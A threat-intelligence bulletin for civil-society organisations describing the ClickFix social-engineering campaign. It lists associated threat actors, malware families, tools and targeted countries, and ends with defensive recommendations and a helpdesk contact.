Intelligence on Malware, Threat Actors, and Campaigns in Motion

Introduction

Darkstream Dispatch is a monthly intelligence report dedicated to tracking and analyzing malware families, threat actors, and cyber campaigns primarily targeting Civil Society Organizations (CSOs), human rights defenders, and advocacy groups. As digital threats become more sophisticated, CSOs face increasing risks from state-sponsored actors, cybercriminals, and surveillance campaigns designed to compromise their operations, communications, and safety. This volume focuses on a campaign utilizing the Social Engineering technique, ClickFix.

Description

Security Researchers have reported a growing use of the ClickFix technique by threat actors. ClickFix is a social engineering tactic that persuades users to execute malicious commands or scripts on their devices, often under the guise of providing solutions to common computer issues. As its popularity among attackers has risen, the method has evolved into various forms, such as counterfeit error messages or fake reCAPTCHA prompts. These deceptive ploys lead victims to open a command prompt and run attacker-supplied code. Once executed, the commands deliver a range of malicious payloads, including LUMMAC.V2, DARKGATE, and NETSUPPORT, which can steal sensitive credentials or grant remote access to compromised systems.

Overview

Campaign Type: 

Social Engineering

Motivations: 

Espionage, Financial Gain

Source Region:  

Eastern Europe, Mexico.

Confirmed Targeted Industries: 

Civil Society & Non-Profits, Aerospace & Defense, Agriculture, Automotive, Chemicals & Materials, Construction & Engineering, Education, Energy & Utilities, Financial Services, Government, Healthcare, Hospitality, Insurance, Legal & Professional Services, Manufacturing, Media & Entertainment, Oil & Gas, Pharmaceuticals, Retail, Technology, Telecommunications, and Transportation.

Associated Threat Actors: 

UNC2500, UNC4108, UBC4984, UNC5055, UNC5112, UNC5142, UNC5518, UNC5692, UNC5736, UNC5750, UNC5774, UNC5925, UNC5996, UNC6072, UNC6089, UNC6095, UNC6108

Associated Malware: 

ARECHCLIENT2, BLACKWIDOW, CHUNKPILE, CLEARSHORT, CROSSTRICK, CRYPTBOT.V3, CURLYFENCE, CURLYGATE, DARKGATE, FAKETREFF, IRONWIND, LUMMAC, LUMMAC.V2, MAPLESYRUP, PALEBEAM, PEAKLIGHT, PRIVATELOADER, RIGDUST, RIGTUNE, SHADOWLADDER, SHADOWLADDER.IDAT, SLOWPINE, SNAPDRAGON, STEALC, VIDAR, VOLTMARKER, WETJAR, WINDYTWIST.SEA, XWORM, ZAPCAT

Targeted Countries: 

Australia, Belgium, Canada, Czech Republic, Denmark, France, Germany, Hong Kong, Italy, Liechtenstein, Madagascar, Morocco, New Zealand, Philippines, Qatar, Singapore, Spain, Sweden, Switzerland, Togo, United Arab Emirates, United Kingdom, United States.

Associated Tools

7ZIP, ADVIPSCAN, ANYDESK, AUTOIT, BOINC, CURL, NETSUPPORT, NLTEST, POWERSHELL, RUBEUS, TEAMVIEWER, WHOAMI

Find the full list of IOCs here:

Security Recommendations

CcHUB recommends that organizations;

• User Awareness & Training – Educate users on ClickFix tactics and avoid running unverified commands or scripts.

• Endpoint Security Controls – Restrict script execution, enforce least privilege, and use EDR/XDR for behavioral detection.

• Application & System Controls – Implement application whitelisting (AppLocker/WDAC) and disable unnecessary command-line tools.

• Email & Web Filtering – Use secure email gateways, DNS/web filtering, and browser protections to block malicious sites.

• Threat Detection & Response – Monitor for suspicious command-line activity, update IoCs, and maintain an incident response playbook.

• Patch & System Hardening – Keep systems updated, secure browsers/plugins, and apply group policies to block unsafe macros/scripts.

To read more about the ClickFix Social Engineering Campaign, kindly read the group-ib article here.
If you also suspect a security breach of some sort, reach out to us on our helpdesk (help@cchub.africa)